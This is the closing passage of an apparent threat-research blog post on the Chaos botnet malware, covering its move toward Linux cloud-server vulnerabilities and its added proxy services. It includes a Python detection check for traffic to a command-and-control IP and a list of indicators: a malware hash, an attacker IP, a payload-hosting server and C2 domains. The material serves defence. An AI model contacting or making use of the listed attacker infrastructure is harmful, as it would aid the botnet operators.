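flow = {"dst_ip": "70.39.181.70", "dst_port": 65111, "dst_host": ""}
for hit in check_flow(flow):
    print("ALERT:", hit)
```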

Key takeaways

While Chaos is not a new malware, its continued evolution highlights the dedication of cybercriminals to expand their botnets and enhance the capabilities at their disposal. Previously reported versions of Chaos malware already featured the ability to exploit a wide range of router CVEs, and its recent shift towards targeting Linux cloud-server vulnerabilities will further broaden its reach.

It is therefore important that security teams patch CVEs and ensure strong security configuration for applications deployed in the cloud, particularly as the cloud market continues to grow rapidly while available security tooling struggles to keep pace.

The recent shift in botnets such as Aisuru and Chaos to include proxy services as core features demonstrates that denial-of-service is no longer the only risk these botnets pose to organizations and their security teams. Proxies enable attackers to bypass rate limits and mask their tracks, enabling more complex forms of cybercrime while making it significantly harder for defenders to detect and block malicious campaigns.

Credit to Nathaniel Bill (Malware Research Engineer)
Edited by Ryan Traill (Content Manager)

Indicators of Compromise (IoCs)

ae457fc5e07195509f074fe45a6521e7fd9e4cd3cd43e42d10b0222b34f2de7a - Chaos Malware hash

182[.]90.229.95 - Attacker IP

pan.tenire[.]com (107[.]189.10.219) - Server hosting malicious binaries

gmserver.osfc[.]org[.]cn (70[.]39.181.70, 154[.]26.209.250) - Attacker C2 Server

References

[1] - https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/

About the author
Nathaniel Bill
Malware Research Engineer